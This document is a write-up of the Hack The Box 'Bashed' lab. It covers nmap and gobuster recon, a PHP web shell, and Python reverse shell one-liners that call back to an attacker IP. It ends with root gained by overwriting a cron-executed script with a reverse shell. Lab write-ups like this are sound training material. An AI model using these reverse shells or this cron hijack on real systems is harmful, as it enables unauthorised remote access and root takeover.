HTB - Bashed
Getting Root:
Start with nmap and noticed that port 80 is the only port opened
Using gobuster we discover a directory called /dev which contains a phpwebshell
We get a reverse shell using python
Simple enumeration shows we can execute any commands as scriptmanager
Used sudo -u to become scriptmanager and create a reverse shell script in python which gets executed by root every 1 minute.
Nmap
# Nmap 7.80 scan initiated Mon Mar 2 12:37:01 2020 as: nmap -sC -sV -p- -oA nmap/Bashed 10.10.10.68
Nmap scan report for 10.10.10.68
Host is up (0.040s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site
Gobuster
gobuster dir -u http://10.10.10.68 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x php -o Bashed_gobuster.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.68
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2020/03/02 12:50:38 Starting gobuster
===============================================================
/uploads (Status: 301)
/php (Status: 301)
/css (Status: 301)
/images (Status: 301)
/dev (Status: 301)
/js (Status: 301)
/config.php (Status: 200)
/fonts (Status: 301)
/server-status (Status: 403)
===============================================================
2020/03/02 12:56:42 Finished
===============================================================
Gobuster discovered a directory named /dev which includes a phpwebshell.
Getting a Reverse Shell
Using a python reverse shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.20",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' Started the listener
rlwrap nc -lnvp 9001
listening on [any] 9001 ...
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.68] 57102
/bin/sh: 0: can't access tty; job control turned off
$
Improving the shell
python -c 'import pty;pty.spawn("/bin/bash")'Privilege Escalation
Using linpeas.sh, the following is very interesting: linpeas.sh GitHub: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite
[+] Testing 'sudo -l' without password & /etc/sudoers
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#commands-with-sudo-and-suid-commands
Matching Defaults entries for www-data on bashed:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALL
That means we can run any command as user scriptmanager
www-data@bashed:/dev/shm$ sudo -u scriptmanager whoami
sudo -u scriptmanager whoami
scriptmanager
www-data@bashed:/dev/shm$
www-data@bashed:/dev/shm$ sudo -u scriptmanager id
sudo -u scriptmanager id
uid=1001(scriptmanager) gid=1001(scriptmanager) groups=1001(scriptmanager)
www-data@bashed:/dev/shm$
www-data@bashed:/dev/shm$ sudo -u scriptmanager /bin/bash
sudo -u scriptmanager /bin/bash
scriptmanager@bashed:/dev/shm$
scriptmanager@bashed:/dev/shm$ id
id
uid=1001(scriptmanager) gid=1001(scriptmanager) groups=1001(scriptmanager)
The user scripmanager can access the /scripts directory (this shows on the linpeas.sh but www-data couldn't access it)
# output from linpeas.sh
[+] Interesting writable Files
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files
/dev/mqueue
/dev/shm
/dev/shm/linpeas.sh
/run/lock
/scripts
/scripts/test.py There are two files there. It seems like something is executing the test.py script with root privileges because if you mv test.txt test.bkp, after some time, the file gets created again and is owned by root.
# File named test.py
cat test.py
f = open("test.txt", "w")
f.write("testing 123!")
f.close
# File named test.txt OWNED by root!!! (huh??)
scriptmanager@bashed:/scripts$ cat test.txt
cat test.txt
testing 123!scriptmanager@bashed:/scripts$
# These are the file permissions
drwxrwxr-- 2 scriptmanager scriptmanager 4096 Mar 2 12:04 . │| CVE-2018-17199 5.0 https://vulners.com/cve/CVE-2018-17199
drwxr-xr-x 23 root root 4096 Dec 4 2017 .. │| CVE-2018-1333 5.0 https://vulners.com/cve/CVE-2018-1333
-rwxr--r-- 1 scriptmanager scriptmanager 58 Dec 4 2017 test.py │| CVE-2017-9798 5.0 https://vulners.com/cve/CVE-2017-9798
-rw-r--r-- 1 root root 12 Mar 2 11:07 test.txt
You can modify the test.py script (this script is owned by user scriptmanager, which is our user) and see if you can get a reverse shell with root privileges. As you can see below, I reused the same exact reverse python shell I used to get user but this time I changed the formatting a little bit.
#!/usr/bin/python
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.20",9002))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
We get a shell as root
rlwrap nc -lnvp 9002
listening on [any] 9002 ...
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.68] 59522
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# python -c 'import pty;pty.spawn("/bin/bash")'
Investigating a little bit into what was executing the test.py on the /scripts directory, we noticed that root had a cron job running which executes all python scripts every minute
root@bashed:/scripts# crontab -l
crontab -l
* * * * * cd /scripts; for f in *.py; do python "$f"; done If you want to learn a little bit more about crontab, check out this site below:
Last updated